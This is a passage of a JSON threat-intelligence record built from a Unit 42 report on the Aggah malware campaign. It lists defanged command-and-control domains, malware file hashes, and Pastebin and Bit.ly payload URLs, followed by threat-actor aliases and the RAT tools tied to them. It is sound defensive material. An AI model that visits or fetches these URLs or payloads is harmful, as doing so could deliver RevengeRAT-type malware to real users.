18\n\nhelloweenhagga3.ddns[.]net\r\nhelloweenhagga4.ddns[.]net\r\nhelloweenhagga2.ddns[.]net\r\nrevengerx211.sytes[.]net\r\nrevengerx212.sytes[.]net\r\nrevengerx213.sytes[.]net\r\nrevengerx214.sytes[.]net\r\nrevengerx215.sytes[.]net\r\nrevengerx216.sytes[.]net\r\nrevengerx217.sytes[.]net\r\nrevengerx218.sytes[.]net\r\nrevengerx219.sytes[.]net\r\nrevengerx210.sytes[.]net\r\noffice365update.duckdns[.]org\r\nsysten32.ddns[.]net\r\nbhenchood.ddns[.]net\r\nemmanuelstevo.ddns[.]net\r\nzinderhola1.ddns[.]net\r\nzinderhola.ddns[.]net\r\nmyownlogs.duckdns[.]org\r\ncocomo1.ddns[.]net\r\ncocomo10.serveblog[.]net\r\ncocomo2.ddns[.]net\r\ncocomo2.serveblog[.]net\r\ncocomo3.serveblog[.]net\r\ncocomo4.serveblog[.]net\r\ncocomo5.serveblog[.]net\r\ncocomo6.serveblog[.]net\r\ncocomo7.serveblog[.]net\r\ncocomo8.serveblog[.]net\r\ncocomo9.serveblog[.]net\r\nmrcode.hopto[.]org\r\nmrcode1.hopto[.]org\r\nmrcode2.hopto[.]org\r\npussi2442.ddns[.]net\r\nUnit 42 has identified additional indicators associated with the Aggah campaign. 
These indicators include:\r\nDelivery documents:\r\n63684ec73be78b2676470484602caf7090e73ed589618cedb017a09b15cc4abc\r\n89d925222af65a01b69a65ae4bba878c0c64cdb9ac06d54d9da6bf1911c5a41d\r\nPastebin URLs:\r\nhttps://pastebin[.]com/raw/5EH8DHwd\r\nhttps://pastebin[.]com/raw/TaCG9fsP\r\nhttp://pastebin[.]com/raw/5J5dtrzL\r\nBit.ly URLs:\r\nhttps://bitly[.]com/ChutasdhikhasdAS[number 1-20]\r\nBlogspot:\r\nRevengeRAT:\r\n0f266a7c9ff37313e6d8b823e3407271e635d565cde3e0829a15fffa65f776d8\r\nC2 Domains:\r\nmajorsss.duckdns[.]org\r\ncycbra.duckdns[.]org\r\nSource: https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nhamper Windows Defender and kill Office applications. The tb5gHu2G script also attempts to run the same “2LDaeHE1” VBScript as the script hosted on the Blogspot blog, which downloads and executes the payload from the Pastebin page shown in Figure 6. Figure 10 shows the Pastebin page hosting the tb5gHu2G script.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"
	],
	"report_names": [
		"aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18278778-fa63-4a9a-8988-4d266b8c5c1a",
			"created_at": "2023-01-06T13:46:38.769816Z",
			"updated_at": "2026-04-10T02:00:03.094179Z",
			"deleted_at": null,
			"main_name": "The Gorgon Group",
			"aliases": [
				"Gorgon Group",
				"Subaat",
				"ATK92",
				"G0078",
				"Pasty Gemini"
			],
			"source_name": "MISPGALAXY:The Gorgon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd",
			"created_at": "2022-10-25T15:50:23.296989Z",
			"updated_at": "2026-04-10T02:00:05.347085Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"Gorgon Group"
			],
			"source_name": "MITRE:Gorgon Group",
			"tools": [
				"NanoCore",
				"QuasarRAT",
				"Remcos",
				"njRAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53",
			"created_at": "2022-10-25T16:07:23.693797Z",
			"updated_at": "2026-04-10T02:00:04.711987Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"ATK 92",
				"G0078",
				"Pasty Draco",
				"Subaat",
				"TAG-CR5"
			],
			"source_name": "ETDA:Gorgon Group",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Atros2.CKPN",
				"Bladabindi",
				"CinaRAT",
				"Crimson RAT",
				"ForeIT",
				"Jorik",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"MSIL",
				"MSIL/Crimson",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Origin Logger",
				"Quasar RAT",
				"QuasarRAT",
				"Recam",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"SEEDOOR",
				"Scarimson",
				"Socmer",
				"Yggdrasil",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434118,
	"ts_updated_at": 1775792156,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.pdf",
		"text": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.txt",
		"img": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.jpg"
	}
}